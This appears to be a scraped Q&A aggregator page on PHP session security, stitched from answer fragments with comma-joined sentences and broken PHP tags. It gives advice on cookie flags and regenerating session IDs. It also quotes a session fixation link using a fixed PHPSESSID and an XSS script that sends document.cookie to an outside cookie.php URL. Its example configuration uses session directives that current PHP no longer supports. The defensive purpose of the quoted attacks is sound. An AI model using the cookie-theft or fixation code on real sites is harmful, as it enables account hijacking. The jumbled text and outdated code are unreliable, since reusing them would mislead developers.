How secure are PHP sessions?

Asked
Active3 hr before
Viewed126 times

7 Answers

sessionssecure
90%

So, in short: PHP sessions are as secure, as your use of them makes them be. This is true for any session-cookie-based system I know of.,PHP sessions are only secure as your application makes them. PHP sessions will give the user a pseudorandom string ("session ID") for them to identify themselves with, but if that string is intercepted by an attacker, the attacker can pretend to be that user.,Trusting only a session cookie (and only the existance of a session cookie) seems not to go very far security-wise to me, no matter where this session cookie comes from - PHP or elsewhere.,Ensures any sessions created are actually valid, so you can trust a prefix (eg, if the prefix is $userId-)

Here is an example of the usage:

< ? php
session_start();
if (password_verify($_POST['password'], $hash)) {
   $_SESSION['auth'] = true;
} ?
>

The session can then be accessed across the site to check to see if the user has been authenticated.

< ? php
session_start();
if ($_SESSION['auth']) {
   echo "You are logged in!";
} ?
>
load more v
88%

PHP Sessions security issues,And then, there are security issues.,We will see what are potential vulnerabilities, and php session security best practices.,HyperText Transfer Protocol started off as a stateless protocol. This means that every request to the server is self-contained, it carries all the context that the server needs to serve the requested web page. Every message that the client sends to the server can be processed on its own – the server does not maintain the state, nor information about the connection.

PHP as a web programming language belongs to the application layer. PHP builds on HTTP cookies to provide a mechanism to maintain context across multiple requests. For this, it combines custom, specific cookie header with its own session handler class:

SessionHandler implements SessionHandlerInterface, SessionIdInterface {
   /* Methods */
   public close(): bool
   public create_sid(): string
   public destroy(string $id): bool
   public gc(int $max_lifetime): int | bool
   public open(string $path, string $name): bool
   public read(string $id): string
   public write(string $id, string $data): bool
}
72%

session.cookie_httponly should be set to 1. This tells the user's browser not to make this cookie available to Javascript, which limits the damage of a cross-site scripting attack.,We want to use only cookies., session.cookie_secure should be set to 1. This tells the user's browser not to send the cookie at all unless over HTTPS., Session Fixation: By tricking the client into using a session ID known to an attacker, it's possible to impersonate the user later.

Example Configuration

session.save_handler = files
session.use_cookies = 1
session.cookie_secure = 1
session.use_only_cookies = 1
session.cookie_domain = "example.com"
session.cookie_httponly = 1
session.entropy_length = 32
session.entropy_file = /dev/urandom
session.hash_function = sha256
session.hash_bits_per_character = 5
load more v
65%

PHP Sessions are often taken for granted. A session is a magic array which persists across page loads and holds user-specific data. It’s a fantastic and integral part of most web applications. But when misused, sessions can cause substantial security holes, performance and scalability problems, and data corruption. A deep understanding of sessions is vital to production web development in PHP.,[…] PHP Sessions in Depth […],There are four main ways an attacker can steal a user’s PHP session ID.,You don’t want session data to be lost when adding or removing servers.

Listing 1

< ? php
session_start();

if (!isset($_SESSION['counter'])) {
   $_SESSION['counter'] = 0;
}

$_SESSION['counter']++;
echo $_SESSION['counter'];
load more v
75%

PHP sessions are only secure as your application makes them. PHP sessions will give the user a pseudorandom string ("session ID") for them to identify themselves with, but if that string is intercepted by an attacker, the attacker can pretend to be that user.,Avoids user sharing session ID accidentally by sharing a URL with the session ID in it,Periodically regenerate the session ID and invalidate old session IDs shortly after regenerating,Prevents the session ID from appearing in a Referer header

Here is an example of the usage:

< ? php
session_start();
if (password_verify($_POST['password'], $hash)) {
   $_SESSION['auth'] = true;
} ?
>
load more v
40%

If the session identifier is regenerated every time there is a change in the level of privilege, the risk of session fixation is practically eliminated:,PHP generates a very random session identifier, so prediction is not a practical risk. Capturing a session identifier is more common—minimizing the exposure of the session identifier, using SSL, and keeping up with browser vulnerabilities can help you mitigate the risk of capture.,Visit this URL using a different computer, or at least a different browser, and include the same session identifier in the URL:,While this convenience is helpful, it is important to realize that it is not a complete solution. There is no inherent security in PHP’s session mechanism, aside from the fact that the session identifier it generates is sufficiently random, thereby eliminating the practicality of prediction. You must provide your own safeguards to protect against all other session attacks. I will show you a few problems and solutions in this chapter.

    <a href="http://example.org/index.php?PHPSESSID=1234">Click Here</a>
    < ? php

    header('Location: http://example.org/index.php?PHPSESSID=1234');

    ?
    >
    < ? php

    session_start();

    $_SESSION['username'] = 'chris';

    ?
    >
    http: //example.org/fixation.php?PHPSESSID=1234
    $ cat / tmp / sess_1234
    username | s: 5: "chris";
    < ? php

    session_start();

    if (isset($_SESSION['username'])) {
       echo $_SESSION['username'];
    }

    ?
    >
    http: //example.org/test.php?PHPSESSID=1234
    < ? php

    session_start();

    if (!isset($_SESSION['initiated'])) {
       session_regenerate_id();
       $_SESSION['initiated'] = TRUE;
    }

    ?
    >
    < ? php

    $_SESSION['logged_in'] = FALSE;

    if (check_login()) {
       session_regenerate_id();
       $_SESSION['logged_in'] = TRUE;
    }

    ?
    >
load more v
22%

When you are using sessions, PHP will most often store a cookie on the client computer called PHPSESSID (can be changed by you). This cookie will hold a value, a session identifier, which is associated with some sort of data on the server. If the user has a valid session ID then the data associated with the session will get into the $_SESSION super-global array. Sessions can also be transferred via the URL. In that case it would be something like ?PHPSESSID=id_here.","Sessions and cookies are also two things where you have to watch out. Although they cannot breach your application's security they can be used to compromise user accounts.,By doing this, they can get cookies for other browsing session. After that, it is possible to get private information from cookies, and sometimes even the session ID. Then, lots of illegal actions can be executed through it.,There are many ways to get a session ID, for example, you develope a forum, if you don't check user inputs, malicious users will load a script in a forum like this

There are many ways to get a session ID, for example, you develope a forum, if you don't check user inputs, malicious users will load a script in a forum like this

<script>
   document.location = 'http://www.yourforum.com/cgi-bin/cookie.php?' +
      document.cookie;
</script>
load more v

Other "sessions-secure" queries related to "How secure are PHP sessions?"